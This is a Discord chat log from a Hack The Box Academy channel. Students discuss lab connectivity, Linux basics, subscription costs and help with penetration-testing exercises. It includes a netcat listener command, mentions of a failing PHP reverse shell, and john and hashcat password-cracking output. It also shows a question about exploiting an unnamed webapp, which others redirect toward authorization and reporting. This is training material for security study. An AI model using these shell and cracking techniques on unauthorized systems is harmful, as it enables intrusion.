hmm, is you can get the wireshark capture file out of the box, maybe just attach it to a support ticket? Possibly a video o "idle" vm could be also helpful. I'm not sure how exactly this works but as i've said earlier i think the pwnbox should have no trouble with connectivity to boxes

Will do, thanks for the help!

I'm not sure how the support stuff works though, i've never used it so don't be too eager about that

Hey, general question for the group: I've noticed that a lot of my meterpreter connections in the labs frequently timeout after not so much time passes. In practice, I know that there are a multitude of things that could contribute to this (such as AV, system instability, etc.). However, I figured the labs that were purpose-built for introducing folks to Metasploit wouldn't include this added instability.

I'm wondering if anyone else has encountered a similar issue and what they've done to try and generate more stable shells.

shells/sessions sometimes just die, that's how things work. from my experience there are usually multiple factors that affect it. I'd say it's mostly stable on htb with certain exceptions. Are you having trouble on some specific box/lab/..? Are your sessions terminating regularly? Is there some common time period of termination?

Yeah, my thoughts too. It's just the frequency that it's occurring that's making me think I need to optimize something.

This problem seems to be agnostic of the Module in HTB Academy, hence my rationale that I might be inadvertently failing to configure something appropriately. Timing is about 1min or so post-connection established.

hmm .. are other forms of shells working just fine?

Generally, yes (e.g. python, netcat, perl, etc.)

Once it timed out you were no longer in the shell for meterpretrr

Not a huge deal, just a bit of a quality-of-life problem for stepping through the various Academy modules

sounds like a network related issue

is your vpn stable?

A good question - I'm not sure how to check that.

dm?

Let me rain-check that. I have an IRL appointment to get to right now

Want to send text from terminal to other linux terminal.Suggest me the way?

copy paste?

lol

usually ctrl + shift + c, ctrl + shift + v

@high sentinel real chat i mean to say

then nc -nvlp listener_port , nc listener listener_ip listener_port

can you please describe this command
i am new to this world @high sentinel

what is it that you don't understand?

-nvlp

what exactly are you trying to do anyway?

-l = Listener
-n = No DNS Resolution

• v = Verbose
• p = Port

just want to send text to other ubuntu system without knowing the network ip

-n      Do not perform domain name resolution.  If a name cannot be resolved without DNS, an error will be reported.
-v      Produce more verbose output.
-l      Listen for an incoming connection rather than initiating a connection to a remote host.  The destination and port to listen on can
             be specified either as non-optional arguments, or with options -s and -p respectively.  Cannot be used together with -x or -z.
             Additionally, any timeouts specified with the -w option are ignored.
-p source_port
             Specify the source port nc should use, subject to privilege restrictions and availability.

if only there was a man to tell you

xd good one 😉

sounds like sending a letter to someone without having his address

that's not possible

^

i kwno its its bit tricky

then suggest me how can i check the details of system by using same network

others*

not sure what you mean then

it this related to htb academy? if so, ask more specificaly? if not, i'd suggest you ask about that elsewhere

ok thanks man @high sentinel

i got the man @fathom pendant

officially a man 😄

#1024429874246590575 start a thread there if it is not related to HTB academy;

like if i connected to network and want to know the other system ip that are connected to the same network

alias lager="man"

how would i read the man man then? 😄 lager lager? 😄

i basically found a vulnerability in this webapp, where I can go ahead and add a public page to registered users, what should I do next to gain file access?

Is this related to htb academy content?

if not then ask in #1024429874246590575 ; are you allowed to have access to these things - if not; have you reported the vulnerability to the webapp devs?

when I run the curl command

I get this but no netcat call out

if you're trying to post a screenshot, you'll need to first verify your htb account in #bot-commands

I am struggling

thank you @fathom pendant

🙂

Looks like a shell PHP, which curl gave you the code for

right but the shell should catch on the listener correct?

What is the PHP code you're trying to run? Cause all I'm seeing is just setting vars

But it's not actually doing the callout

and if youre seeing the vars like that then your php code is likely broken

^

Because generally that means if you navigate to that page you'll see that displayed on the page

yes that is correct

I am seeing the IP and port displayed on the page

but I am following the HTB walkthrough

Disregard

SLOW MOMENT

haha

smh

you are right

@fathom pendant @thorn urchin

Thank you

Np

Easy mistakes :D

isn't that a contradictory note?

not really

the note is just there for an fyi

that latter part is a reminder for this specific exercise

its saying this method is flexible for even different systems but warning it wont work on the exercise due to extra restrictions that situationally you wont see in the real world.

anyone else having problems spinning up boxes for the modules?

hey im on linux fundamentals and im using my own vm running kali and im on a zsh terminal.. and i connected to the vpn connection file it gave me and a spawned a target ip.. i can scan with nmap and see mad ports open.. but when i try to ssh in i get nothing and eventually it ends the connection

yes

i cant connect

but i can scan

what is the question asking you to do?

ok the first question is asking me to id the machine hardware name

the second is to id the path to htb-student home dir

i got the first one answered by using uname -a

and i found the machine har name

mhm

but when i cd into home its my home not the targets

so

what if there was a way to Print the Working Directory

which gives you the FULL path

let me go over the linux funds course real quick to check what it wants more specifically

one moment

pwd

lol

thank you

np

speaking of. let me just quickly knock out linux funds

lol ok maybe im dumb dumb but what happened, i got the answer wrong

is it not /home

/ being the path

no

well

wait dont tell me

/ is the ROOT directory

ok ok

ill figuer it out

/home is all the homes

thank you

you should be able to figure it out from there :)

Is there a problem with starting machines now at academy ?

think of /home as you being in the neighbourhood of all the users and can see who lives where

i was able to start a machine just now, some machines do take slightly longer to spawn depending on services it needs to start up

hmm cant seem to start machines at file inclusions skill assesment 😦

ok so i figured it out it would be /home/htb-student.. but now i know 100% im not on the targets server

so lol why is that

lol why this keep happening

lol i can see that ssh is open so why can't i connect

since you're doing ssh as sudo; it's asking for your password first, ssh is something you don't need to do as sudo

also

"htp-student" it's "htb-student"

omg

wtf

which is also probably why

lol yup probably why for sure

o that hurts

if you wish to continue with help my DMs are open, as I said I'm just gonna bust through these

dope thanks

ping me here if you dm because I have it set to not notify me if I get a dm request

also biggest of the tips: linux is case sensitive with it's options

-l and -L are 2 different things

@fathom pendant i msged you

Hi, I'm on the windows module and the last section. I just did the first two steps. Now I'm doing step 3 but it's bugging me a bit. It tells me "Creating a user called jim; Uncheck: User must change password at logon" I'm doing it through "Family & others users" and i don't get any boxes where i can uncheck "User must change password at logon" so I'm kind of not sure if I'm doing the right thing or wrong thing. Cause I don't remember the module talking about creating accounts https://i.imgur.com/IERGruE.png. Anyone has any idea?

Does anyone know which option's better? It costs 400£ for 5000 cubes. Platinum subscription gives 1000 cubes (or does it?) a month for 53£. Obviously the later seems like a juicy deal, so am I missing something?

@ocean night staff, some help pls?

@fathom pendant

@safe adder When you buy a sub you get the boxes u bought the sub with + more every month

don't just ping random staff

haven't done the intro to windows stuff brother; don't ping random users

Alright

Wdym? I'm referring to the academy subscriptions, is that right? Not the htb platform subscriptions.

jumping to pinging staff before seeing if someone else it better able to redirect you or answer your question is pretty low survival instinct

yes, i think they were meaning the "cubes" you get not "boxes"

Yeah, when you buy a sub you pay a amount of money every month. It depends on what sub you choose, if u choose what I have is 18$ a month you get a sub + 200 cubes a month + unlimited spawn of pwn boxes

this; a lot of learning in these modules are found using our good pal Google and/or reading the manual of the command

And this is the academy I'm talking about

why is the provided cheat sheet for the file transfers module so bare? there are loads of information and commands to gain from the module

Thank you, I see. My current subscription covers free access to all up to certain tiers, such as tier 0 - 2. Beyond them needs "cubes". As you can see the Plat subscription deal seems a lot better, 1000 cubes for 53£ a month whereas 5000 cubes cost you 400£. I just making sure before I got hit with something different.

Staffs current online can you confirm? @ocean night

<@&861185840277487616>

ouch

There should be more information about this on the site, i think they have a FAQ. What kind of sub do you have right now?

Don't ping random staff

I really don't think I used the cheatsheets much tbh I stuck to my notes

Currently, it's student plan.

But what do you think should be included, I'd submit in #858470491676737536 if you think it's something worth adding to the cheat sheet @dim wolf

Active Directory skill assessment #2: + 1 Crack this user's password hash and submit the cleartext password as your answer.

May I get a hint please? I attempted kerberoast as Admin on MS01 host.

Ah, i think the student plan only have access to a few tiers. But once u buy a higher sub u have access to all the others. Not 100% about this. But as i said, there is information about this on the site i found this helpful when i bought my sub

The silver annual didn't specify monthly cubes, rather access to all tiers up to II, whereas monthly Silver gives you 200+ cubes a month.

Silver annual = silver monthly, just pay annually instead of monthly

well they are totally different though

Some people are just annoying. They know nothing, just want to mouth off.

i added a bunch of stuff to the cheat sheet for my reference but i don't have enough self-confidence to submit a suggestion like that

Just do it, if anything you'll get feedback as to why it wasn't included

¯_(ツ)_/¯

and then they ping staff randomly

i will.. consider it.

Big question, why is anime a thing as a PP?

what??

Cultured thing!

what module is this about

The anime module

dont spam modules chat with off topic stuff

verify your account in #welcome and shitpost in general chat

staff released some modules that look really interesting but too bad i only have student sub rn

I tried that but couldnt find the key to verify my account on academy

The major difference between the two is; annual gives you the access to the modules and job role paths, the monthly does not

sucks to suck, dont spam

And annual includes a voucher for one of the job role paths

Lmao

the voucher expires after a year though so you can't just stack vouchers

But then you can buy it with the cubes which comes every month

@rustic sage you have the Silver monthly?

Not counting the refunds; the silver monthly plan you'd get enough to outright buy all of the CPTS path after 10 months

Yes i do

but you are not considering you are also getting back some of your cubes with tier 2 and others you get all back

Then I think, Plat is also going to be the same. If Silver gives 200 cubes, it's probably going to be the same.

While yes, it's also assuming you're going to take the exam within the year

That's why I said not counting, realistically it's probably around 4-5 months

true

Maybe 6

agree :))

I don't feel like doing all that math

hahaha

me neither

I have student sub anyway

hahaha

But the point is flexibility

¯_(ツ)_/¯

It's more flexible to be able to go through the path without having to wait for more cubes or buy anyway

yes, especially if you are in hurry or sth

Yea

And considering the value of one of the cert vouchers (which are good for 2 attempts) ($210 + tax) that's already half the value

Hey guys? What module are you guys talking about?

Lol

Funny guy

all of them

hahaha

As the topic is still regarding the modules and academy, it's still on-topic

¯_(ツ)_/¯

discussing optimal ways to purchase modules is an on topic subject for modules channel

And the answer is it depends

Don't spam

I just did the Linux fundamentals lol realized I bought it but never did it

When I looked at subscriptions, it seemed cheaper to buy the cubes.

Silver annual costs £350; the exam would cost £150, so you're effectively paying £200 for the cubes. At that point, all the tier 0/1/2 modules added up to 1960 cubes (net), although I think HTB have added a few more since. So, that's roughly £200 for 2000 cubes.

By contrast, I could buy 2000 cubes for £160 if I bought them without a subscription.

Yes, and that's if your intent is solely to go down one path

With little to no deviation

works for me

The other thing I noticed about the cubes is that there's no bulk discount. So, the only reason to buy 1000 at a time rather than 10 purchases of 100 cubes is convenience.

I bought em in chunks as I cleared out modules. was easier than dropping the full load at once

you can do it better with platinium just wait a month and a day for 2000 cubes

It says free access to all modules up to tier 2. I actually think buying cubes itself is expensive. For example, 400£ for 5000 cubes. If I do platinum subscription, 53£ monthly for 1000 cubes/month.

That's for student

The platinum wasn't around when I got started; I haven't done the sums for that.

As well

it also depends how long you expect yourself to take

Currently the plat is 40% off. That's why I'm asking people who've bought it.

If you're on the student one, no reason to go past

But it just depends

If you want to do that it's on you

For the Silver Annual part, I'm a bit confused because it gives you direct access up to tier 2 modules but did not mention cubes so.

if it doesnt mention qubes you dont get qubes

^

No reason to have cubes if you can access it

It wouldn't give you cubes, but you can calculate the number of cubes you would need to achieve the same result.

And yes if you complete a module you get permanent access to it

So if you cancel after a year you can go back

I see. Another good thing about the platform is I've been seeing updates and new modules, which I'm impressed. Good to know they're really putting in the effort to put out more content. So for certain, more low tier modules will come out and so for that, maybe direct access to tiers would be better?

up to your personal preference tbh

if you're not interested in the app side of things (bug bounty path) then it may not be worth it. But doesn't hurt to be able to just choose whatever modules you want after completing your desired path

unless you're a college student, in which case the student sub gets you the most value until you've completed all available modules

The other benefit of subscriptions is CPE credits (presumably for ISC2?) but I can get those other ways.

still not sure what CPE credits are for

Sudent sub in my opinion is really worth it. 6£ monthly for tiers up to 2. Btw, what is the CPE credits?

I know that the "main" HTB can be used for CPE at ISC2 (so many points for each active box you get), and I assume that there's a similar thing for HTB academy, but I haven't seen any official details.

CPE credit submission is available to our subscribed members. Subscribed members can obtain credits by completing Hack The Box Academy modules, Tier I and above. In order to start tracking your activity and automatically get your credits, you just need to enable this option through your account settings.

Here is how CPE credits are allocated:

Fundamental modules: 2 CPE credits
Easy modules: 4 CPE credits
Medium modules: 6 CPE credits
Hard modules: 8 CPE credits
Insane modules: 10 CPE credits

although there haven't been any insane modules released yet

oh I see that you have also used the convenient help button

I've bought 1000 cubes (solo purchase) so far, and I've used about half of them. Based on this discussion, I think I'll go for Platinum for a month, since it's cheaper than buying the other 1000 directly.

don't tell anyone but i didn't actually use the help section

now i know it's there though

You see the 40% discount on platinum?

It says 36% for me. So, £53 rather than £80 (ex VAT).

How do you get the ISC2 member ID? What's that.

I'm putting this training through my limited company (VAT registered) so it won't cost me anything in the long term.

you have to have an active cert from an ISC2 compliant entity

Im having a hard time with the attacking sql service in the attacking services module, the credentials provided have no privilege and I cant seem to do anything

as most certifications do expire after a certain amount of time

What does the credits do?

https://www.isc2.org/-/media/ISC2/Certifications/CPE/MEM-CPE_Handbook-DIGITAL.ashx

Continuing education Credits are used in lieu of redoing the exam to have it extend

Thank you.

In my case, I've got the SSCP, so I need 20 CPE (on average) per year to keep it active. It hasn't been particularly useful, but if I can pick up the CPE from stuff I'd do anyway then I might as well keep it going.

when it comes time to renew your cert: if you have enough CPE; in a relevant field, they just say "alright you've proven you're staying on top of this" and tend to renew

tfw i thought I had sec+ from compTIA but I don't kekw

I suggest you, read the section again. It was pretty straight forward. Probably you skipped sth

do you mean sqsh?

Its not allowing me to autheticate I read the section not sure whats going wrong

mysql wont work with the credentials they provided

are you using parrot

people were discussing sqsh is broken in parrot

I use kali so dont have any idea

sqsh is indeed borked on parrot

I am using kali linux, I can access sqsh but not sure what to do here, I used help to see the commands

Okay so I should look up sqsh syntax?

probably

Hey, I'm doing Footprinting/IPMI module rn. I got admin pass hash. I put it into txt file and use provided hashcat command. Everything is working great (I hope so), but I'm wondering if everything is great with progress of unhashing (?). Could somebody look at my screenshot and tell me if I have to wait 5 days for results?

I'm using VMWare kali linux (hashcat isn't working on my Windows idk why)

hashcat crack speed depends on specs but you don't have to wait 5 days to crack the hash.

in my case i cracked it in about a second

im really struggling with this sqsh syntax, the section doesnt say anything about it

although it also depends on what wordlist/patterns you're using

^

is there a place to buy badges like you get on defcon to hack?

seems cool

nope

unless you mean physical merch then maybe the swag shop

¯_(ツ)_/¯

i mean in general, outside this platform

https://hideandsec.sh/books/ctf/page/northsec-2021-badge-writeup

something like this

anyway i see im in the wrong channel too sorry

can I message someone who knows about sqsh syntax

I remember how I did this one now; I ran it through johntheripper

I also came up with this idea, but in the meantime I noticed that there is rockyou.txt on the machine. I used it and within 2 minutes I had the answer ready. Thanks again for your help!

I just finished the Metasploit module on academy and at the end it reads “To get more practice with this tool, check out the HTB boxes tagged at the end of this module” but i can’t find what it’s talking about can anyone show me please?

thanks

On the main page of Hack the Box (www.hackthebox.com) you can register and find machines that you can solve. For retired machines you might need a subscription

what do I need to do after I decoded to the state ":"?

anyone complete

Skill Assessment - Broken Authentication?

hm... interesting

Have a question regarding "Password Attacks":"Protected Files" section, the question point to use the cracked password for the user Kira.... what cracked password? that phrasing is confusing, is that cracked password already provided, or am I to enumerate the box, and find a file/hash to crack and obtain the password that way?

nvm, I figured it out

hi all

is there a support channel on discord?

best way to contact support is through the website chat bubble

great then i can wait 3 days for them to reply and then have them close my ticket early lol

thanks

and now the chat button isn't loading

if it's not showing up; search an article and say "no that didn't help" or do you mean the green chat bubble; adblock stops it from popping up if you have that enabled

ya thats the one i dont have any block software but i'll try what u just said

hmm thats not working either all it gives is 3 emojis to give feedback

anyone here done enterprise networks?

ye

sadface emoji

then it should give you the option

ya i did that it doesnt do anything

any ideas why this john would end the session right after starting without actually cracking the hash?

john --format=PKZIP --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:22) 0g/s 7279Kp/s 7279Kc/s 7279KC/s !jonaluz28!..*7¡Vamos!
Session completed

try --show

at end maybe it was already cracked

actually i know why

john zip.hash --show
0 password hashes cracked, 1 left

looks like it's a format that john doesn't know how to decode

interesting, I mean I generated the hash with zip2john and it does load it as PKZIP

i had a similar thing happen with a different module

where it gave the *Vamos!

is it also possible the pass was salted as well?

I mean... it would be going way out of what the module is showing me to do

also

it could be the case that rockyou isn't the wordlist

did the module provide you a different wordlist?

check resources in upper right of module above table of contents

its finishing in 1ms, I dont think its even starting, rockyou is a big list, even if the password was not there, it should run for a while

true

ill use a different wordlist to see

try doing john without --format it can often determine which one

it can also falsely identify but that is also a possibility

same thing

└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:36) 0g/s 7469Kp/s 7469Kc/s 7469KC/s !jonaluz28!..*7¡Vamos!
Session completed

try remaking the hashfile

yep make sure there arent any extra lines or spaces or bad chars

ssh2john was broken, but that was a python issue, so I had to modify it to work, I wonder if something else is broken with this

yeah let me try remaking the hash

go into it with nano and check for the things i just said 🙂

nano < vim

perhaps 🙂

vim is better :) if you know how to utilize it properly

much better

which i dont lol one of these days tho

nothing, different wordlist, new hash, no empty lines of weird characters... john is not liking it

will try fcrackzip I guess....

i don't think pkzip is accepted?

i think normal zip is

https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats

from the man page:

-format:NAME
  Allows  you  to  override  the ciphertext format detection. Currently, valid format names are DES, BSDI, MD5, BF, AFS, LM.  You can use  this  option  when cracking or with '-test'. Note that John can't crack password files with different  ciphertext  formats at the same time.

try adding -test to see if it gives you a reason

I see, thanks, let me give that a try

anyone did squashed in htb ?

that's a box right?

if so you're better of asking in #boxes after verifying your htb account in #bot-commands

Hey! Can someone help me with with Attacking Common Applications Assessment I? The last question regarding the flag... I was able to use the /cgi to view the directory and get to the flag... However, no command is allowing me to view the contents of the flag.

Any advice? thanks!

Hi gang,
Doing the CPTS path. just did Footprinting\FTP\2nd task. Could someone explain to why I'm able to connect to the ftp server, download the content (flag), but not list the content with 'ls' while being connected? It prompts me for a creds

hey can anyone give me a hand im really stuck, i can not vpn in

can you elaborate?

Anybody who finished the web services and api module from cbbh? 😁

i sent you a dm

please, would somebody be able to assist with the last question on the skill assessment on LFI module, things i have tried so far include; -i have fuzz for parameter using ffuf and saw that one working param is the page param
-i have tried fuzzing with the LFIjhadix.txt file in order to spot a path traversal i can use but no success
-i have look for cve concerning php v7 and nginx without success
-i have gone through the source code but no hint

I am guessing they put it like that to show you common ftp misconfigurations. Normally, you shouldnt be able to download anything. I am also guessing you enter as anonymous

My suggestion, do footprinting module before attacking common services

Yes did.
Was just a bit annoying cause I spent a fair amount of time to try to figure out why I couldn't list the objects in it.

Great learning experience though

boy oh boy i just went down some horrendous rabbit holes in the file inclusion skills assessment